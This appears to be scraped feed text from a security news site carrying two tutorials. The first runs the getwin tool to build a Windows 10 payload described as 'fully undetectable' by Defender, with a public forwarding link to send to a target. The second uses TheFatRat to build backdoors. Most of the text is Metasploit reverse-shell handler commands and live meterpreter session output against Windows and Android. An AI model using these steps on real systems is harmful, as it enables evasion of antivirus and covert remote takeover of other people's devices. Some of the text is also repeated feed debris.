The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.
]]>Payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do Not Upload the payload generated on virustotal.com.
The tool does not need any configuration, no need to configure port forwarding or install other programs. See the demonstration in below video.
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git Cloning into 'getwin'… remote: Enumerating objects: 46, done. remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46 Unpacking objects: 100% (46/46), done. root@kali:/home/iicybersecurity/Downloads# cd getwin/ root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh root@kali:/home/iicybersecurity/Downloads/getwin# ls getwin.sh icon LICENSE README.md
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
_______ _ _ _ _
(_______) _ (_)(_)(_)(_)
_ ___ _____ _| |_ _ _ _ _ ____
| | (_ || ___ |(_ _)| || || || || _ \
| |___) || ____| | |_ | || || || || | | |
\_____/ |_____) \__) \_____/ |_||_| |_|v1.2
.:.: FUD win32 payload generator and listener :.:.
.:.: Coded by:@linux_choice :.:.
:: Warning: Attacking targets without ::
:: prior mutual consent is illegal! ::
[*] Choose a Port (Default: 4098 ): [*] Payload name (Default: payload ): test01 [] Put ICON path (Default: icon/messenger.ico ): [] Compiling… [] Saved: test01.exe [!] Please, don't upload to virustotal.com ! [] Starting server… [*] Send the first link above to target + /test01.exe: Forwarding HTTP traffic from https://ludius.serveo.net Forwarding TCP connections from serveo.net:2119 [*] Waiting connection… listening on [any] 1547 …
Do Not Upload the payload generated on virustotal.com
[*] Waiting connection… listening on [any] 4342 … connect to [127.0.0.1] from localhost [127.0.0.1] 43878 TCP connection from 27.4.174.190 on port 3352 Microsoft Windows [Version 10.0.17758.1] (c) 2018 Microsoft Corporation. All rights reserved. E:>C: C: C:>ipconfig ipconfig Windows IP Configuration Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13 IPv4 Address. . . . . . . . . . . : 192.168.1.5 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::1%13 192.168.1.1 C:>getmac getmac Physical Address Transport Name =================== ========================================================== ##-##-##-E8-##-## \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC} (For security reasons we have hide the MAC address)
The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.
]]>The post Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) appeared first on Information Security Newspaper | Hacking News.
]]>According to ethical hacking researcher of International Institute of Cyber Security did a detailed analysis on the working of TheFatRat to check on the insides of pentesting tool.
TheFatRat is an another metasploit like tool which is used to generate backdoor easily. This tool is used to compile some of the malware with some popular payloads which then can be used to attack operating systems like Windows, MAC, Linux. This tool gives many options like creating backdoors, infected dlls, as per ethical hacking investigation..
The whole tool has been tested on Parrot OS. And after creating backdoors. These backdoors has been opened on Windows 10 Build 1607 and android.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
msf5 exploit(multi/handler) > exploit
[] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 2 opened (192.168.1.12:4444 -> 192.168.1.5:61331) at 2019-01-30 15:19:28 +0000
meterpreter >
[] Sending stage (179779 bytes) to 192.168.1.5 [] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000
meterpreter >
The difference between backdoors are that 1st backdoor uses c# + powershell where you files to the target. And second backdoor where you have to simply choose the options to create backdoor. As another backdoor requires to set payload. And the third where the backdoor uses a webserver apache to create backdoor. The third backdoor makes a strong backdoor for attackers. The session does not get expired easily. As the above two expires session suddenly while testing, according to ethical hacking courses.
[*] Meterpreter session 1 opened (192.168.1.12:80 -> 192.168.1.5:61331) at 2019-01-30 17:45:28 +0000
Id Information Connection
------ ------------ -----------
1 meterpreter php/linux www-data (33) @apache2 192.168.1.7:80 -> 192.178.1.5:61331
msf exploit(handler) > session -i 1
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.7
LHOST => 192.168.1.7
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[] Started reverse TCP handler on 192.168.1.7:4444 [] Sending stage (70554 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.12:58445) at 2019-01-31 02:04:20 +0000
meterpreter > help
Core Commands
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : dalvik/android
meterpreter >
The post Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) appeared first on Information Security Newspaper | Hacking News.
]]>